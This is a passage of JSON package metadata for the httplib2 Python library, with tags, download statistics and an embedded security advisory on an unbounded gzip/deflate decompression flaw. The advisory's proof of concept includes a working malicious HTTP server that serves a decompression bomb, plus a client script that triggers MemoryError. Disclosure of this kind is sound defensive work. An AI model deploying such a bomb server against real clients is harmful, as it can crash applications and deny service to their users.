3","Topic :: Internet :: WWW/HTTP","Topic :: Software Development :: Libraries"],"normalized_name":"httplib2","project_status":null},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2024-08-05T09:47:16.000Z","size":3797,"stargazers_count":488,"open_issues_count":63,"forks_count":185,"subscribers_count":27,"default_branch":"master","last_synced_at":"2024-08-27T11:38:21.795Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2024-08-27T08:56:42.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":36,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":217498203,"owners_count":16186291,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2024-09-08T01:27:12.100Z","dependent_packages_count":266,"downloads":176832295,"downloads_period":"last-month","dependent_repos_count":48310,"rankings":{"downloads":0.038517480516574436,"dependent_repos_count":0.028062735804932806,"dependent_packages_count":0.08840678861423276,"stargazers_count":3.767926677390422,"forks_count":4.790657493392418,"docker_downloads_count":0.008987412120534036,"average":1.4537597646398523},"purl":"pkg:pypi/httplib2","advisories":[{"uuid":"GSA_kwCzR0hTQS1qNWc5LWY4OGYtZ2ZqM84ABfpq","url":"https://github.com/advisories/GHSA-j5g9-f88f-gfj3","title":"httplib2: Decompression Bomb Denial of Service via Unbounded gzip/deflate Response Handling","description":"### Summary\n\nThe `httplib2` HTTP client library performs unbounded decompression of HTTP response bodies encoded with `Content-Encoding: gzip` or `deflate`. A malicious or compromised HTTP server can return a small compressed payload (approximately 150 KB) that expands to an arbitrarily large size in memory (150 MB or more), causing `MemoryError` or OOM-kill in the client process. This is a classic decompression bomb (zip bomb) attack against the HTTP client.\n\nAny application using `httplib2.Http().request()` against untrusted or attacker-controlled HTTP endpoints is affected.\n\n### Details\n\n**Affected code:** `httplib2/__init__.py` - `_decompressContent()` function\n\nThe decompression path has two unbounded operations:\n\n1. **gzip decompression** (line 394):\n   ```python\n   content = gzip.GzipFile(fileobj=io.BytesIO(new_content)).read()\n   ```\n   The `.read()` call with no size argument decompresses the entire gzip payload into a single in-memory bytes object. There is no limit on the decompressed size.\n\n2. **deflate decompression** (line 397):\n   ```python\n   content = zlib.decompress(content, zlib.MAX_WBITS)\n   ```\n   Similarly, `zlib.decompress()` returns the fully decompressed content as a single bytes object with no size bound.\n\n3. **Automatic invocation** (line 1431): `_decompressContent()` is called automatically on every HTTP response that includes a `Content-Encoding: gzip` or `deflate` header. The full compressed body is already buffered in memory via `response.read()` before decompression begins.\n\n**Root cause:** There is no `max_decompressed_size`, streaming decompression with size tracking, or decompression ratio check anywhere in the decompression path. The library unconditionally trusts the server's compressed payload size.\n\n**Attack vector:** Any HTTP server (including man-in-the-middle attackers or compromised upstream services) can trigger this by returning a response with:\n- `Content-Encoding: gzip` header\n- A small compressed body that decompresses to an arbitrarily large size\n\n### Proof of Concept\n\n**Step 1 - Start a malicious HTTP server that serves a gzip decompression bomb:**\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP server that serves a gzip decompression bomb.\"\"\"\nimport gzip\nimport http.server\nimport io\nimport socketserver\n\nUNCOMPRESSED_SIZE = 150 * 1024 * 1024  # 150 MB\n\ndef make_payload():\n    \"\"\"Create a gzip payload: ~150 KB compressed -\u003e 150 MB decompressed.\"\"\"\n    buf = io.BytesIO()\n    with gzip.GzipFile(fileobj=buf, mode=\"wb\", compresslevel=9) as gz:\n        chunk = b\"A\" * (1024 * 1024)  # 1 MB of repeating bytes\n        for _ in range(UNCOMPRESSED_SIZE // len(chunk)):\n            gz.write(chunk)\n    return buf.getvalue()\n\nPAYLOAD = make_payload()\n\nclass Handler(http.server.BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.send_response(200)\n        self.send_header(\"Content-Type\", \"application/octet-stream\")\n        self.send_header(\"Content-Encoding\", \"gzip\")\n        self.send_header(\"Content-Length\", str(len(PAYLOAD)))\n        self.end_headers()\n        self.wfile.write(PAYLOAD)\n    def log_message(self, fmt, *args):\n        pass\n\nwith socketserver.TCPServer((\"127.0.0.1\", 8000), Handler) as httpd:\n    print(f\"Bomb server ready: {len(PAYLOAD)} bytes compressed -\u003e \"\n          f\"{UNCOMPRESSED_SIZE} bytes decompressed\")\n    httpd.serve_forever()\n```\n\n**Step 2 - Run the httplib2 client (in a separate terminal):**\n\n```python\n#!/usr/bin/env python3\n\"\"\"Client that demonstrates MemoryError from httplib2 decompression bomb.\"\"\"\nimport resource\nimport httplib2\n\n# Set a 180 MB memory limit to make the crash deterministic\nLIMIT_MB = 180\nlimit = LIMIT_MB * 1024 * 1024\nresource.setrlimit(resource.RLIMIT_AS, (limit, limit))\n\nhttp = httplib2.Http(timeout=5)\ntry:\n    response, content = http.request(\"http://127.0.0.1:8000/\")\n    print(f\"Unexpected success: received {len(content)} bytes\")\nexcept MemoryError:\n    print(f\"MemoryError confirmed: decompression bomb exhausted \"\n          f\"{LIMIT_MB} MB memory limit\")\n    # This is the expected outcome - the 150 KB compressed payload\n    # expanded to 150 MB during decompression, exceeding the limit.\n```\n\n**Expected output (client):**\n```\nMemoryError confirmed: decompression bomb exhausted 180 MB memory limit\n```\n\n**Reproduction metrics:**\n- Compressed payload size: **152,908 bytes** (~150 KB)\n- Decompressed size: **157,286,400 bytes** (150 MB)\n- Amplification ratio: **~1,029x**\n- Client memory limit: 180 MB -\u003e `MemoryError` triggered during `gzip.GzipFile.read()`\n\n### Impact\n\n**Severity: High**\n\nAny application using `httplib2` to make HTTP requests to untrusted servers is vulnerable. The attack requires no authentication, no special configuration, and no user interaction - the server simply returns a crafted gzip-compressed response.\n\n| Parameter | Value |\n|---|---|\n| Compressed payload | ~150 KB |\n| Decompressed size | 150 MB (configurable 